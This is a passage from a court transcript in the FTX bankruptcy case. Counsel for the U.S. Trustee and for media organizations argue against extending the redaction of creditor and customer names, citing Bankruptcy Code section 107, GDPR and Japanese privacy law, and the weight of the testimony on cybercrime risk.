 5   authority because they released the names of creditors who

 6   were individual citizens of these countries.  And I don't

 7   believe they haven't given any example of any other party in

 8   any U.S. legal proceeding that was penalized for doing the

 9   same.

10        And they do have the burden of proof here and they

11   have failed to provide any expert testimony on foreign law,

12   which they could have done, to support their contention that

13   both, the GDPR and the Japanese law prevent the disclosure of

14   even the names of these individuals without, you know,

15   without addresses or email addresses.

16        They've also failed to provide expert testimony to

17   support their contention that the exceptions -- and there are

18   exceptions both, to the GDPR and the Japanese law that allow

19   for disclosure in connection with legal proceedings -- they

20   have not put forth any expert testimony to support their

21   argument that those exceptions do not apply here.

22        They also do not explain how the debtors are going

23   to identify which of their customers or other creditors who

24   are citizens of the EU, the U.K., or Japan, are actually

25   citizens of those countries.  In many cases, I mean, the

1   debtors said at the beginning of this case that a lot of

2   cases, they don't even have street addresses for people; they

3   only have email addresses.  But even for those that they do

4   have a street address, that tells you residency and, frankly,

5   it doesn't even necessarily tell you that.  It's just an

6   address that somebody has where, maybe, they get mail.  But

7   even if it's their residence, it doesn't tell you what

8   country they're a citizen of.

9           And I recall that there was some discussion of

10  this in the hearing in January, and I thought that one of the

11  reasons for this other hearing was to give the debtor time to

12  try to figure that out, which of their customers are actually

13  citizens.  Well, we have had no testimony whatsoever on that

14  issue or any explanation of how the debtors are going to

15  determine that question of who's a citizen.  Because if

16  they're not a citizen, I could be living in Japan, I don't

17  think I'm covered by Japanese privacy laws.  I mean, maybe

18  I'm wrong -- again, we don't have any expert here to explain

19  it -- but I don't think it -- I think the -- I don't think

20  the contention is, and I think that the laws actually state

21  that they only apply to citizens.

22          Now, going to the GDPR, again, even though the

23  debtors have the burden of proof here, the Movants have the

24  burden of proof, the motion fails to identify -- and the

25  Movants have not provided any evidence that they have pursued

1   any threshold assessment of the risk of penalization under

2   the GDPR.  There is, for example, no proof that was

3   introduced that the debtors sought consent of any of their EU

4   or U.K. creditors or customers, because that's an exception.

5   If you get their consent, you can disclose the names.  So

6   there's been no evidence that they tried that route.  In

7   addition, and that's under GDPR Article 49(1)(a).

8           The motion also fails to demonstrate that the

9   debtors have made any inquiry with the applicable EU, GDPR

10  supervisory authority, or the U.K. Commissioner about the

11  lawfulness of transferring the names of the EU or U.K.

12  creditors to the U.S., by filing that information in the

13  bankruptcy cases, pursuant to the requirements of the

14  Bankruptcy Code and the Bankruptcy Rules.

15          They could seek a permit from the supervisory

16  authority or the U.K. Commissioner.  They have not indicated,

17  they have not produced any evidence to show that they have

18  done so.  And, particularly, in light of the tenets of the

19  legal claim exception, the exception to allow information to

20  be produced in legal pleadings and the discretion that's

21  expressly given by the GDPR to the debtors' supervisory

22  authority or the U.K. Commissioner, and the strength of the

23  American laws that mitigate in favor of full disclosure in

24  these bankruptcy cases, these types of diligence by the

25  debtors are crucial at this stage of the -- excuse me -- at

1   the implementation of the GDPR and critical to the debtors'

2   faithful fulfillment of their fiduciary duties in this case.

3           All they do is say, Here's the law.  There's a

4   possibility we could be penalized.  We haven't taken any

5   steps.  We -- there are steps that are set forth in the GDPR.

6   We have not taken steps to find out if we actually would be

7   penalized by doing this.  Again, (indiscernible) this falls

8   under the exception.  We could go to our supervisory

9   authority under the GDPR and get that information, go through

10  that process.

11          They have not gone through that process.  All they

12  said is:  There's a possibility we could be penalized,

13  without, again, ever giving any example of any penalization

14  ever happening to any U.S. debtor for disclosing names of

15  citizens of the U.K. or the EU, let alone, Japan.

16          Now, one of the cases that's cited by, I believe,

17  the Ad Hoc Committee in support of their argument in this

18  regard is Forever 21.  Forever 21 was mine.  I was the trial

19  attorney assigned to this case for the U.S. Trustee.

20          They quote -- they have language that they say is

21  a quote from the transcript that quotes redaction of names

22  and addresses.  That quote is not on that page.  It is not in

23  the transcript -- I did a word search -- and repeatedly

24  throughout -- it was Judge Gross' case -- you can see

25  throughout, Judge Gross talks about the addresses, the

 1  addresses.

 2           That's what -- the debtors were represented by

 3  Kirkland & Ellis.  The debtors moved -- their motion was not

 4  to redact the names; it was only to redact addresses of

 5  citizens of the EU and also addresses of their employees.

 6  But putting that aside for the foreign law, it was just

 7  addresses.  They did not request the names to be redacted.

 8  If you read the transcript, that is clear.  There was no

 9  order that was entered that allows for the redaction of names

10  of the citizens of the EU.

11           And one can look at the entire docket, there is no

12  evidence that Forever 21 was ever penalized under the GDPR,

13  for releasing names.  They're right in the creditor matrix.

14  They're in the schedules.  Their -- the addresses were

15  redacted, but the names were not.

16           Now, moving on to Japanese law, in the initial

17  motion that was filed by the debtors, and that was November/

18  December of last year, there's no mention of Japanese law.

19  They just -- I had a paragraph, maybe, on the GDPR.  It said

20  very little.  But there was no mention of Japanese law at

21  all.

22           And the reply on that motion, which was probably

23  filed in early January, was one paragraph that referenced

24  Japanese law.  There were some paraphrases of some portion of

25  it.  There was no translation attached.  There was no -- even

1    a website given to where to find this Japanese law.  Nothing.

2              At the January 20th order that Your Honor entered,

3    there's no reference to Japanese law at all.  There's

4    references to citizens of the U.K. or the EU that are covered

5    by the GDPR and I don't believe Your Honor made any ruling

6    with respect to Japanese law.

7              So, in April, the debtors' motion, then,

8    referenced, again, one paragraph about Japanese law with no

9    reference to where one could find an English translation of

10   this law, which is, of course, relatively -- it's not a one-

11   paragraph law.

12             So the question becomes, so what happened between

13   Your Honor's January 20th order and now?  Have they released

14   the names of these Japanese citizens?  Because if they've

15   already released them -- not for those who are customers.  I

16   understand anybody who's a customer, they have redacted that

17   because they're a customer.  But any creditor who's a

18   Japanese citizen who's not a customer, if they've released

19   that information, pats on their back.  If they haven't, then

20   they've redacted it without Court authority.

21             I don't know what the answer is to that; however,

22   again, when they put in the motion, they did not tell us

23   where one could find an English translation.  So in their

24   reply, the Movants say that the U.S. Trustee did not engage

25   regarding the Japanese law.

1         I can tell you why we didn't engage.  All I had

2    was their paraphrase of tiny portions of it.  It wasn't until

3    the reply that they filed on Monday that they finally gave us

4    a website where we could get the law and it's quite a long,

5    you know, it's not one paragraph.

6         I'm not an expert in Japanese law, of course.  I

7    wish there was one here.  There is not.  But I look at the

8    statute and I see an exception in 27(1) that says, For cases

9    based, there's an exception to the requirements of

10   nondisclosure for cases based on laws and regulations, quote,

11   unquote.

12        The Movants say in their reply, well, that only

13   applies to Japanese laws and regulations, not foreign.  But

14   it doesn't say that.

15        So, again, we're in a situation where this Court

16   is asked to interpret Japanese -- a foreign law with no

17   expert to explain it.  The plain language, I think, says this

18   can be disclosed and, you know, if it's required to be

19   disclosed under laws and regulations.  And it is required to

20   be disclosed under U.S. law.

21        And then the Movants state the reason the Court

22   should consider Japanese laws is because if they do not

23   comply, there could be economic consequences.  To that, they

24   cite to the Japanese Financial Instruments Exchange Act of

25   Japan.  I do not have a translation.  I do not have a website

**A0654**

 1   of where to get a translation.  I have no idea what that law

 2   is about.  They are the Movants; it is their responsibility

 3   to provide the Court and other parties in interest with where

 4   to find certified, you know, correct translations of these

 5   foreign laws.

 6            If the debtors are going to take the position that

 7   this Court should consider foreign laws, I think they have it

 8   do everything possible to make the -- that information

 9   available, not just -- the information and the interpretation

10   of laws.  Because as we know, Your Honor, Your Honor

11   interprets the Bankruptcy Code every day.  It's not just you

12   look at a page and see what it says.  So, we need an accurate

13   translation and we need to have somebody explain the impact

14   of that law and how it's interpreted and how it's applied,

15   and we don't have any of that.

16            Now, as Your Honor knows, in our objection, we

17   said in the alternative, if Your Honor is going to be

18   granting the relief requested, we wanted to have -- we were

19   hoping to have some carve-outs.  The first carve-out has to

20   do with information regarding insiders.

21            The debtors should not be permitted to redact the

22   names of insiders, be they individuals or corporations, on

23   their schedules and SOFAs.  And with respect to non -- you

24   know, corporations or other legal entities, they should not

25   be able to redact addresses, as required by the Bankruptcy

1  Code and the Bankruptcy Rules and the official forms.

2           And it doesn't matter, I mean, whether they're

3  customers or not customers, whatever it is, it shouldn't make

4  any difference.  I mean, this is a case about wrongful

5  transfers that took place prior to the petition date to

6  insiders.  So the statement of financial affairs, you know,

7  one of the critical pieces of it is a disclosure of all

8  transfers made to insiders within the one year prior to

9  bankruptcy.  And some of the names are not redacted and other

10  of the names are.

11           And when I asked why, the answer is, Well, we

12  redacted if they were a customer.  If the insider was a

13  customer, we redacted their name.

14           Okay.  So let's look at that from the legal

15  arguments that they made.  Is that protected under 107(b)?

16           I mean, there has to be a balance, of course, here

17  and the think the balance on the information regarding

18  insiders, I think the balance is very strongly in favor, even

19  if Your Honor feels that they, in general, they've met the

20  requirements of 107(b) or 107(c), in general, that these can

21  be an exception.  What is value of saying, Well, including in

22  our customer lists are insiders.

23           I mean, of course, that's not a big surprise.  I

24  don't think that that's telling anybody something they don't

25  already know, that the insiders of the company may very

 1  likely be customers.  So I don't think the value, the

 2  incremental value of that information is worth anything,

 3  frankly.

 4          Now, for those insiders who were individuals,

 5  under 107(c), I mean, again, the only thing that you know is

 6  that their name, which, if they're an insider, I mean,

 7  they're either a director, an officer, or they have some

 8  other, you know, significant connection to the debtors.  That

 9  information is probably already publicly available somewhere,

10  but even if it isn't, all you're saying is the person's name

11  and they're a customer of the debtors, which, again, is

12  hardly surprising.  I mean, you're not telling somebody

13  that's not easy to guess that insiders of the debtors are

14  likely customers.

15          So it's no the really giving any more information

16  that's what's already out there.  And you have to weigh that

17  the importance of knowing who, again, publicly knowing who --

18  which insiders received one-year transfers from these

19  debtors.  Any of those other constraints have to be

20  overridden by that.

21          Now, the debtors say, let's get to me taking a 341

22  examination, which I haven't been able to do yet, okay,

23  because how do you ask questions when I can't say the

24  person's name?  Your Honor, you have to understand that --

25  and I don't know if Your Honor is aware -- that the schedules

1   and statements filed in this case are thousands and thousands

2   and thousands of pages.  So, you have two sets.  You have the

3   set that was filed on the public record that has the ECF

4   numbers; that is the information that is redacted.  And then

5   you have this other thousands and thousands and thousands of

6   pages of information.  You have to try to match it up.

7          And then let's say I match it up, okay, this

8   unredacted version has a person's name and this redacted

9   version doesn't have the person's name.  Now, how am I going

10  to conduct my questioning in a 341 in a way -- it's public,

11  right.  Creditors can be on, I mean, they're allowed to.

12  They have the right; the 341 is a meeting of creditors.  This

13  is a public examination.  So if the names are redacted, I

14  cannot say the names.

15         The record of this very important examination is

16  going to be, frankly, unintelligible, because we don't know

17  who they're talking about.  And what's going to be -- I don't

18  even know how I can possibly do this.  And, again, this

19  information is so critical in this case where there were

20  these massive -- there's been allegations of massive

21  transfers to insiders prior to the petition date.  This

22  information just cannot be redacted.  The tiny -- whatever

23  tiny value it is to know that an insider of the debtor was a

24  customer or the tiny incremental information about this

25  director or officer of the debtors, you know, was a customer;

1   yeah, again, that's not telling anybody anything they don't

2   already know.

3           And even with respect to other information, not

4   just the one-year transfers, if, for example, there's

5   transfers, there's gifts.  You know, there's been a lot of

6   allegations about some of these gifts that were given, okay,

7   charitable gifts.  Well, who received the charitable gifts?

8   Well, some of the names are redacted.  Why are the names

9   redacted?  They're customers.

10          Oh.  But you can't tell they're a customer by

11  looking at the statement of financial affairs and say, Who

12  did you give gifts to?  You can't tell who's a customer.  I

13  mean, that doesn't tell you they're a customer, just because

14  they got a charitable donation.

15          So, you know, they've created a problem.  They've

16  made their own problem, effectively.  Nobody would have

17  known.  I mean, how could you know?  Just because somebody

18  gets a charitable donation doesn't mean they're a customer,

19  presumably, one would think.

20          So, and there's other examples, Your Honor.  There

21  was a motion that was filed, and I hope I have this

22  correct -- I don't know that it matters that much -- it was a

23  motion, I believe, to reject executory contracts.  And, of

24  course, they have to list the names of who the contractual

25  counterparties are.  Some of the names are redacted.  Some of

1    them weren't and some of them were.

2            When I asked, Why are some of the names redacted?

3    The answer was, Oh, they're customers.

4            Nobody would know they were customers.  I mean,

5    there's no way to know that they were customers.  Until you

6    redacted the names, there was no way to know that they were a

7    customer.

8            This is not -- and it's different than -- with

9    respect to the creditor matrix, and there's been argument

10   there, you can have a creditor matrix.  It doesn't say you're

11   a customer.  But the debtors' argument was that the vast

12   majority of our creditors, the vast, vast, vast majority are

13   customers.

14           But, you know, you have a -- that certainly wasn't

15   true with this motion.  Maybe half the names or less -- I

16   don't remember -- were redacted.  Contract counterparties,

17   some of them are customers.  Some of them aren't.  There's no

18   way to know if you don't redact the names.  So, we also think

19   in that situation, they should not be permitted to redact

20   names.

21           Now, there's also other situations involving the

22   names of insiders, maybe apart from the schedules and

23   statements where if the debtor -- well, the U.S. Trustee

24   would ask, again, if Your Honor is going to grant the motion,

25   generally, is that any time the debtor wants to redact the

1    names of insiders in anything, anything they file, they need

2    to make a separate motion.  It should not be a given that the

3    names of insiders could be redacted.

4              There may be other very important filings in this

5    case where they're referenced to insiders.  In the plan and

6    disclosure statement, are they going to be redacting the

7    names of insiders because they're customers; again, unless

8    it's Sam Bankman-Fried and four other people?

9              I mean, so, it should not be a given.  If it's an

10   insider, they should be required to take that extra step,

11   make a motion, and then we have an opportunity -- then others

12   have an opportunity to respond.

13             THE COURT:  Okay.

14             MS. SARKESSIAN:  And, Your Honor, in the Third

15   Circuit in Cendant Corporation, which is 260 F.3d 183 (2001)

16   said:

17             "The burden is on the party who seeks to overcome

18   the presumption of access to show that the interests in

19   secrecy outweighs the presumption."

20             And I think that that is especially important when

21   we're talking about insiders.

22             And the purpose, when we're talking about

23   schedules and statements of financial affairs, the purpose of

24   requiring the debtors to disclose all their assets,

25   liabilities, and business dealings is to ensure that the

**A0661**

1    creditors have reliable and accurate information that they

2    can rely on to determine the status of the debtors' financial

3    affairs and to trace the debtors' financial history.  That's

4    very important in this case.  That's In re Hayes, 549 B.R.

5    677 (Bankr. D. S. C. 2016).

6              The bankruptcy schedules and statements of

7    financial affairs are designed to elicit certain information

8    necessary for the proper administration and adjudication of

9    these cases.  The balance of the rights and creditors of

10   other parties for information on insiders against the chance

11   under 107(c), the disclosure of just the names would create

12   an "undue risk of identity theft or other unlawful injury,"

13   which is from the statute, and consider that with respect to

14   an officer, director, or insider, who may already have public

15   information linking them to the debtors, almost certainly,

16   again, that balance really shifts in favor of disclosure.

17             And as to insiders who are not natural persons,

18   the balance of whatever value they have as a customer versus

19   the presumption of public access of information about

20   corporate insiders, okay, that should be released.  That has

21   to be released, as well.  I mean, to say that we're going to

22   redact the name of a corporate insider because they're a

23   customer, that balance, again, weighs very strongly in favor

24   of disclosure.

25             Just -- I'm almost done, Your Honor -- with

1  respect to the Ad Hoc Committee if the Court does grant their

2  motion, we would ask the right to reserve the right to later

3  seek their names -- just their names, not what their exact

4  holdings are or anything like that, but just their names --

5  to be unredacted if they become involved in plan negotiations

6  or otherwise take a larger role in this case.

7          And the Ad Hoc Committee says that they, quote,

8  Act in a representative capacity for the interests of all

9  non-U.S. customers, not for their own individual benefit,

10  close quote.  That's paragraph 18, I think, of their reply.

11          That's a reason to disclose the names.  I mean, I

12  think non-U.S. customers have the right to know who is

13  claiming to represent them.  I mean, right now, as far as I

14  know, they have not had a large role in the case, but if they

15  step up and the role becomes greater, just like Your Honor

16  said, the names of the committee members -- the members of

17  the Official Committee of Unsecured Creditors, those names

18  have to be released.  And if you're a corporate committee

19  member, your address has to be released, as well; Your Honor

20  had already ruled that, previously.

21          Similarly, if the Ad Hoc Committee takes a larger

22  role, we would like, again, the opportunity (indiscernible)

23  now, but the opportunity to be able to argue later that that

24  information, the members' names should be released for the

25  same reason that the Committee's information was released.

**A0663**

1          And, actually, in that regard, there's one thing.

2    The proposed order that Your Honor entered on January 20th

3    had a provision stating that the names of the committee

4    members had to be -- could not be redacted.  They had to be

5    released on the top-50 list or whatever the number was in the

6    top creditor list.  But that was actually -- that is not in

7    this order, this proposed order.  So we would certainly ask

8    that that be -- we want that to be clear that those names,

9    just like Your Honor previously ruled, that that would

10   continue to be the case.

11         And just in conclusion, Your Honor, you know, one

12   thing that the debtors argue is that, and, again, the Movants

13   argue is that, well, they're only asking for another 90 days.

14   Although, again, for some, they're asking for permanently,

15   for the customers who are individuals, they want that

16   permanently, but, otherwise, it's just for 90 days.  It's

17   already been 6 months, so another 90 days, now we're at 9

18   months, and debtors' counsel indicated they might ask for a

19   further extension.

20         So, you know, we're -- it's been a long time for

21   this information to remain redacted.  So, again, Your Honor,

22   we believe that the Movants have not met their burden of

23   proof, but especially, again, with respect to information

24   relating to insiders or customers or non-insiders in the

25   context that one could not tell that they were a customer

1    from the context of the disclosure, we think that those

2    exceptions can be made and we think there's a reasonable and

3    important basis to make those exceptions if Your Honor is

4    otherwise inclined to grant the motion.

5             Unless Your Honor has any other questions, my

6    argument is concluded.

7             THE COURT:  Okay.  Thank you.

8             MS. SARKESSIAN:  Thank you.

9             THE COURT:  I don't know about anybody else, but I

10   need a lunch break.  So we're going to -- let's recess until,

11   we'll say 1:30.  We'll come back at 1:30, okay.  Thank you.

12        (Recess taken at 12:49 p.m.)

13        (Proceedings resumed at 1:37 p.m.)

14             THE CLERK:  All rise.

15             THE COURT:  Thank you, everyone.  Please be

16   seated.

17             Ms. Townsend, whenever you're ready.

18   Ms. Townsend?

19             MS. TOWNSEND:  Good afternoon, Your Honor.  Katie

20   Townsend, on behalf of the Media Intervenors:  *The New York*

21   *Times*, *The Wall Street Journal*, Bloomberg LP, and the

22   *Financial Times*.

23             I think it's important to address at the outset

24   the applicable burdens, as well as to address, I think, why

25   the Media Intervenors are here in the first place.  Though, I

1  think it should go without saying -- I'll say it anyway --

2  the shared interests of the Media Intervenors here is

3  straightforward.  They're news organizations and they want to

4  report on what is undeniably a newsworthy bankruptcy stemming

5  from the massive collapse of a prominent cryptocurrency

6  platform.

7            That collapse sent shockwaves, not just for the

8  cryptocurrency industry, but the entire financial industry.

9  And at this point, we don't even know where those shockwaves

10 both, individually and institutionally, have hit the hardest

11 or what institutions may have the largest or no exposure, as

12 a result.  That is a compelling and legitimate interest that

13 the press and the public have in the names of the creditors,

14 also customers, in these Chapter 11 proceedings.

15            And it's a particularly salient point when we're

16 talking about the top-50 unsecured creditors.  That

17 distinction is not -- I think it's, as has been suggested, an

18 arbitrary one.  The top-50 creditors are those institutions

19 and individuals who have the most exposure or have been most

20 affected in this bankruptcy proceeding.  So I think --

21            THE COURT:  Let me ask you a question.  What are

22 your clients going to do with this?  If I say the names have

23 to be redacted -- be released, what are you going to do with

24 that information?

25            MS. TOWNSEND:  You know, I can't speak exactly as

**A0666**

1   to what my clients would do with it.  I assume that the

2   reporters would review that information and they would use it

3   to report on exactly what I said.

4          THE COURT:  But if all I give are the names, what

5   are they going to do?  They're going to go -- the first thing

6   they're going to do is go try to identify who the people are,

7   right?

8          MS. TOWNSEND:  Well, some --

9          THE COURT:  They're not going to report that

10  somebody named Mr. X who lives in Shanghai had a lot of money

11  invested in FTX tokens unless they verify that information.

12  And the only way they can do that is try to figure out who he

13  is.  Who's Mr. X?

14         MS. TOWNSEND:  Well, if we're talking about, Your

15  Honor, about, say, the top-50 creditors.  Let's say we're

16  talking a lot about -- we're talking about some institutional

17  investors.  So in cases like that, I think my clients

18  probably would ask for comment or attempt to evaluate what

19  the impact, potential exposure of that institution, which

20  again could have broader financial impacts.

21          There are also individuals who, frankly, my

22  clients would think would be important to report on.  If

23  Jamie Dimon, for example, someone whose views on what

24  investments are good investments to make, has a lot of

25  exposure in -- from his, let's say -- and, again, I don't

1   know this; this is just a hypothetical -- has some -- is one

2   of the top-50 creditors of FTX, would that be newsworthy?

3   Would that be important for the public at large and people

4   who may consider Jamie Dimon's investment moves to be one

5   they would want to follow, is that relevant?  I think so.

6            So, would my clients report on it?  I wouldn't be

7   here if my clients weren't -- didn't think it was important

8   to understanding the entirety of not just what's happening in

9   this bankruptcy proceeding, but the impact of FTX's collapse,

10  to understand who was potentially hurt the most.  I think we

11  do think that's important and that's why I'm here.

12           So, I think the attempts to paint the news media's

13  motives to inform the reader, its readers, and the public at

14  large about what's happening here, as in how illegitimate, as

15  wrong -- is wrong and I think it should be treated as such.

16  That said, the Media Intervenors' motives aren't really

17  relevant and it isn't the Media Intervenors' obligation, or

18  any of the objectors' obligation to demonstrate specific harm

19  from a failure to disclose that information.  It's not our

20  evidentiary burden, as has been suggested, to demonstrate

21  that we have some other interests beyond an informational

22  interest in that information.

23           The starting point is, as Your Honor knows, the

24  presumption of public access under the First Amendment, and

25  Section 107 of the Bankruptcy Code.  Transparency is the

 1   rule.  It's the default in all bankruptcy cases, including

 2   bankruptcy cases in the cryptocurrency context.

 3          So the debtors, the Official Committee, the Ad Hoc

 4   Committee, they bear the burden to demonstrate with evidence,

 5   not explanation or conjecture, that all the information they

 6   want to redact falls within the scope of either

 7   Section 107(b) or 107(c).

 8          I want to start with 107(b), which as Your Honor

 9   knows, permits the protection of an entity with respect to a

10   trade secret or confidential research, development, or

11   commercial information.  This is a statutory and narrow

12   statutory exception.  It's been interpreted to apply to

13   information that's critical to the operations of an entity

14   and in order for the exception to disclosure to apply

15   in 107(b), the disclosure of information at issue must

16   reasonably be expected to cause the entity commercial injury.

17          We understand why the Court at the second day

18   hearing, would want to take an incremental step to seal the

19   names of FTX's customers and creditors, all of them, for 90

20   days; a time period that we understand was calculated to

21   maintain the *status quo* while defendants -- debtors, rather,

22   explore potential valuations of their assets.  But it's now

23   been more than a month since the expiration of that original

24   90-day redaction period and the debtors haven't given this

25   Court an additional basis to conclude that the names of

1    approximately nine million customers fall within the

2    definition of commercial information and warrant continued

3    redaction.

4            The parties are continuing to rely on the

5    testimony, solely on the testimony of Mr. Cofsky, which he

6    supplemented yesterday, where, respectfully, a little more

7    than he gave this Court back in January.  In fact, I think

8    the debtors and the Official Committee seek to concede that

9    there isn't much more to say at this point.  According to

10   their own joint motion, they have yet to determine how

11   they're going to utilize what they call their "customer

12   lists."

13           They assert that the names of the FTX customers

14   are a potential source of value, but being just a possible

15   source of value isn't enough.  And even assuming that it was,

16   the record doesn't establish the disclosure of the names of

17   FTX's customers or any subset thereof, would destroy that

18   potential value.

19           So, Mr. Cofsky maintains that the debtors'

20   customers base or maybe even just the customer list itself

21   could have potential value in a restructuring or a sale, but

22   he has yet to provide any testimony as to what he thinks that

23   value actually is, that specific value.  And he hasn't given

24   us any real world examples of what value, if any, has been

25   ascribed to a list of names of customers standing alone, or

1  otherwise, in other cryptocurrency transactions, for example.

2          Moreover, the primary concern that Mr. Cofsky has

3  identified, the poaching or potential poaching of FTX's

4  customers by competitors, I think, is particularly misplaced

5  in this context.  We're not talking about some list of

6  exclusive customers.  As counsel for the U.S. Trustee pointed

7  out, the Official Committee is a witness.  Mr. Sheridan

8  testified that a vast number of the debtors' customers use

9  other online platforms or exchanges to hold digital assets;

10 in fact, he testified that it's common for cryptocurrency

11 holders to use multiple wallets or online platforms to store

12 their cryptocurrency assets.

13         So simply put, whether or not one or more of the

14 nine million or so customers with FTX accounts moves to a

15 competitor or is poached by a competitor, assuming they were

16 not already using a competitor platform, which they very well

17 may be, that may have nothing to do at all with whether or

18 not that customer also will continue to use FTX's platform at

19 some restructuring in the event that it continues to exist.

20 That determination is likely to have a lot more to do with

21 how that customer feels about FTX, rather than how it feels

22 about some competitor, because it's not an exclusive

23 relationship.

24         Nor, does the evidence, I think, support a

25 conclusion that it's reasonably to be expected that a

1 competitor could or would effectively use this list of names

2 to attempt to poach customers.  So, Mr. Cofsky testified

3 yesterday that he directed his team to locate through Google,

4 Facebook, or Twitter, some mechanism, including through those

5 platforms themselves, like a Twitter direct message, some way

6 to contact the top-200 customers of FTX and they were able to

7 do so for fewer than half of them.

8        And he testified he thought it was highly unlikely

9 that they identified the right person for only 34 percent of

10 them.  He didn't testify as to whether was any effort to

11 actually validate the results of those -- of that experiment

12 by determining whether or not they had, in fact, located

13 accurate, current contact information for those individuals

14 that they had searched for.  But even his sort of best

15 estimate of whether or not they had done a good job was only

16 34 percent.

17        That experiment, one that I think is based on, not

18 representative, and I think concededly, not a very scientific

19 methodology, fails to establish that FTX's customers could be

20 expected to, or could or would effectively operationalize the

21 names of customers to debtors' disadvantage.

22        Moreover, I think even if we assume that

23 Mr. Cofsky's testimony, which is all this Court has in front

24 of it, was sufficient to establish that the names of all of

25 FTX's roughly nine million creditors who are also customers,

1  fall within the scope of Section 107(b), there's been no

2  showing differentiating between different subsets.  I think

3  there was the suggestion that Mr. Cofsky testified that the

4  top-200 creditors, that those names would be the most

5  valuable, but Mr. Cofsky didn't draw distinctions between

6  specific values for specific subsets of customers.

7          So there's no showing that a small subset of that

8  nine million, say, the top-50 creditors, would constitute

9  confidential, commercial information, that if disclosed,

10  would damage in a serious way, whatever potential value that

11  set of names might have.

12          I think debtors, at this point, have had, and the

13  moving parties, at this point, have had an ample opportunity

14  to attempt to meet their burden to demonstrate that these

15  names are, in fact, a primary or critical asset to their

16  business.  There are extraordinary circumstances and

17  compelling need that warrant, frankly, the extraordinary

18  level of secrecy that they're asking this Court to impose,

19  they have not met that burden, in our view, and under 107(b).

20  So, we would respectfully urge the Court not to extend the

21  redaction deadline on that basis.

22          With respect to 107(c), this is a provision, as

23  Your Honor knows, that permits the Court to protect an

24  individual with respect to the following types of

25  information:  to the extent the Court finds the disclosure of

1   such information would create undue risk of identity theft or

2   other unlawful injury to the individual or the individual's

3   property.

4            As an initial matter, Section 107(c) applies only

5   to the names of creditors, customers who are individuals, not

6   entities.  It's right there expressly in the statutory

7   language.  I don't believe that either the debtors or the

8   Official Committee, from what we can tell, unlike the Ad Hoc

9   Committee, suggest otherwise and take the position that it

10  should apply to the names of entities.

11           But for what it's worth, the Ad Hoc Committee

12  offers no case law to support this sort of expansive view of

13  Section 107(c), as applicable to entities, the names of

14  entities.  So I think any argument here, Your Honor,

15  regarding the application of Section 107(c) should be

16  understood to be relevant only to those creditors, customers,

17  who are individuals, who are natural persons.

18           As to those individuals who are natural persons, I

19  do take issue with the suggestion that I think that's been

20  made a number of times today that Media Intervenors are being

21  dismissive of potential risks of harm to individuals who may

22  be targeted or may be the victims of cybercrime.  The Media

23  Intervenors aren't being dismissive; I think we're being,

24  frankly, realistic.

25           Certainly, as we don't dispute Mr. Sheridan's

1  testimony that criminal actors like cryptocurrency.  It's a

2  means, a method for them to effectuate crime; at the same

3  time, as he testified, his testimony is he suggests there's

4  really no limiting principle to the notion of who can be

5  targeted and who can be a victim of these crimes.

6           He provided no evidence to demonstrate that

7  current cryptocurrency or known cryptocurrency users are more

8  frequently the victims of the various online scams that he

9  testified about or even that they're more frequently the

10  targets of those kinds of scams.  And as he testified,

11  unfortunately, online attacks and cyber threats, stalking and

12  bullying are endemic in today's virtual world.  And it's not

13  just in the cryptocurrency context, but bankruptcy

14  proceedings, in general, have information about creditors who

15  may have a significant amount of money tied up in a

16  bankruptcy who may be vulnerable for that reason.  To the

17  extent we take this argument to its logical conclusion, we're

18  effectively flipping the presumption of access in bankruptcy

19  proceedings on its head.

20           So I do think that there are ways.  And, again,

21  we're not dismissive of these risks, I think the position

22  that we're taking is that any restrictions on the public's

23  right to access here need to be narrowly tailored and that

24  there are alternatives to redacting the names of all of the

25  customers or a subset of those customers, and those

1   alternatives can include things like the types of notices,

2   advanced notices that were sent to customers involved in the

3   Celsius case after the fact.

4          We now have the benefit of the unfortunate

5   incident that occurred in the Celsius case.  We can

6   preemptively, or the Court, counsel, sophisticated counsel

7   representing all the various parties in this case can

8   preemptively inform interested parties, this is a potential

9   risk, that they should be wary and mindful of these kinds of

10  scams.  So there's a benefit to what happened in the Celsius

11  case that can be translated here to help, potentially, alert

12  people to the potential risks that may be out there.

13         There's also just the fact that even if these

14  individual customers were not savvy or aware of the potential

15  risks or of investment scams, they are now.  And as

16  Mr. Sheridan testified, in his experience, individuals tend

17  to become more wary of scams when they have already fallen

18  victim to one.

19         But I want to emphasize, too, Your Honor, I think

20  the evidence, it's difficult because we don't know.  We

21  certainly don't know, but there's also been no testimony

22  about the types of individuals.  And, you know, parties can

23  speculate as to whether or not they're sophisticated or not

24  sophisticated, at different sort of levels of investment in

25  the FTX platform.

1              I think, as Mr. Sheridan testified on cross, I

2    think, you know, when we're talking about the top 50

3    individuals with multimillions of dollars invested in

4    cryptocurrency, I don't think there's -- we have any basis,

5    really -- there's been no evidence to suggest -- that there

6    are novice investors in the cryptocurrency context, that they

7    don't have the means or wherewithal or sophistication to

8    attempt to protect themselves from what, again, are

9    unfortunately ubiquitous, I think, attempts at cybercrime.

10             And, particularly, I did want to emphasize to you

11   a point that I think Mr. Sheridan made in his direct about

12   the cryptocurrency industry generally.  Being a higher-risk

13   investment when it comes to making an individual sort of more

14   susceptible to, or a more -- let me put it this way -- a more

15   desirable target, potentially, for criminals, you know, he

16   indicated that the cryptocurrency industry doesn't provide

17   the sort of traditional level of protection that other

18   financial industries have.

19             I just want to note that, you know, we've talked

20   about the customers as sort of one big group, but, certainly,

21   customers who -- and, particularly, customers who are

22   sophisticated investors in cryptocurrency are well aware of

23   those risks.  They're aware that they're investing in an

24   industry that doesn't have those same protections; an

25   industry where cyber criminals may be more interested in

1    cryptocurrency assets, than other types of assets.

2              And so, again, this isn't to sort of diminish or

3    minimize any risk of, or any harm that a victim of cybercrime

4    suffers when they have cryptocurrency or other assets sold,

5    but I think -- or stolen, but I think to the extent that

6    we're talking about very sophisticated investors, when they

7    invest in a risky type of cryptocurrency investment or they

8    make a risky investment, they understand all the risks that

9    are -- we have to assume they understand the risks that are

10   attached to that investment.

11             I won't spend much time on foreign law because I

12   think counsel for the U.S. Trustee covered that quite well,

13   but I think just to reiterate, and thoroughly, just to

14   reiterate the Media Intervenors' position that I don't think

15   we even need to be talking about the GDPR or the content of

16   any foreign law, because public access to judicial records

17   filed in this bankruptcy proceeding is governed by the

18   Bankruptcy Code, the Bankruptcy Rules, the First Amendment,

19   and related U.S. law that mandates access or presumes access.

20             I think the debtors and the official committee's

21   reliance on Section 105 to argue that the Court should take

22   some additional precautions with respect to what they argue

23   might be the potential application of foreign law is a

24   concession, frankly, that neither Section 107(b), nor 107(c)

25   apply here.  And I would emphasize that Your Honor noted in

1   the January 11th, second day hearing, that the Court would

